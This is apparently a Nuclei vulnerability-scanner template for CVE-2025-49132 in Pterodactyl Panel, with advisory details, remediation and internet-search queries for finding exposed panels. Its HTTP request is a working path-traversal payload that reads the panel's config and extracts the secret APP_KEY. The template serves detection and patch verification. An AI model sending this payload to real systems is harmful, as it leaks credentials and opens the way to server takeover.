id: CVE-2025-49132

info:
  name: Pterodactyl Panel - Remote Code Execution
  severity: critical
  author: darses
  description: |
    Pterodactyl is a free, open-source game server management panel. Using the /locales/locale.json endpoint with the locale and namespace query parameters, a malicious actor is able to execute arbitrary code without being authenticated.
  impact: |
    With the ability to execute arbitrary code, this vulnerability can be exploited in an infinite number of ways. It could be used to gain access to the Panel's server, read credentials from the Panel's config (.env or otherwise), extract sensitive information from the database (such as user details: username, email, first and last name, hashed password, IP addresses, etc.), access files of servers managed by the panel, etc.
  remediation: |
    Upgrade to Pterodactyl version 1.11.11+. There are no software workarounds for this vulnerability, but use of an external Web Application Firewall (WAF) could help mitigate this attack.
  reference:
    - https://github.com/pterodactyl/panel/security/advisories/GHSA-24wv-6c99-f843
    - https://github.com/pterodactyl/panel/commit/24c82b0e335fb5d7a844226b08abf9f176e592f0
    - https://github.com/pterodactyl/panel/releases/tag/v1.11.11
  classification:
    epss-score: 0.13105
    epss-percentile: 0.95868
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-49132
    cwe-id: CWE-20
  metadata:
    verified: true
    vendor: pterodactyl
    product: panel
    shodan-query:
      - title:"Pterodactyl"
      - http.favicon.hash:-456405319
      - http.favicon.hash:846001371
      - "Set-Cookie: pterodactyl_session="
    fofa-query:
      - title="Pterodactyl"
      - icon_hash="-456405319"
      - icon_hash="846001371"
      - "Set-Cookie: pterodactyl_session="
  tags: pterodactyl,cve,cve2025,rce,lfi,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/locales/locale.json?locale=..%2F..%2Fconfig&namespace=app"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '{"app":{"version":'
          - '"key":"base64{{'
        condition: and

    extractors:
      - type: json
        name: APP_KEY
        json:
          - ".[] | .app.key"
# digest: 490a00463044022031b0d265b4d98a2d7135080f2e6d0b9925bb7c8d4e60b9b99a69fd07df92c5d4022070e1024a2e64d174e875aa573fc7b0a774f6841a63ad5f3e94735d7cbf3050fb:922c64590222798bb761d5b6d8e72950